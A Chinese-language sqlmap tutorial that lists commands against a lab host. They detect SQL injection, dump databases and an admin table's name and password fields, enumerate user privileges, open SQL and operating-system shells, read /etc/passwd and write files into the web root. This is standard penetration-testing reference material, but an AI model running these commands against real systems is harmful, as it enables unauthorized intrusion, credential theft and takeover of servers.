共計 1827 個字符,預計需要花費 5 分鐘才能閱讀完成。
SQLmap 是一種開源的滲透測試工具,主要用于檢測和利用 SQL 注入漏洞。
它能夠自動檢測目標網站是否存在 SQL 注入漏洞,并通過利用這些漏洞來獲取敏感信息、修改數據,甚至完全控制目標系統。
想要查看更多的命令可以參考用 ”sqlmap -hh” 查看完整的命令幫助文檔。
一、Sqlmap 注入篇
1、檢查注入點
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11
2、爆所有數據庫信息
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs
爆當前數據庫信息
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db
3、列出指定數據庫所有的表名
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables
‘fujieace’ 為指定數據庫名稱
4、列出指定表名的所有列名
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns
‘admin’ 為指定表名稱
5、dump 打印輸出表名指定列名字段的值數據
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump
‘name,password’ 為指定字段名稱
二、Sqlmap 用戶權限篇
1、列出數據庫管理系統用戶:
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users
查看當前連接數據庫用戶:
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user
2、判斷當前用戶是否是 DBA?
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba
3、查看用戶權限:
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace
三、Sqlmap 文件操作與 shell 提權篇
1、sql shell
這里通過 sqlmap 可以直接獲取一個 sql shell,直接執行 sql 語句進行交互。
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();
注意:這里由于進入了 sql shell 可以執行 sql 語句了,也可以用 load data infile、load_file、into outfile 等函數來進行文件讀取或寫入;
2、cmd shell
這里通過 sqlmap 可以直接獲取一個 cmd shell,直接執行 cmd 命令進行交互。
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shell
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig
3、讀取服務器上指定文件
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwd
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt
4、寫入本地文件到服務器上
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt
正文完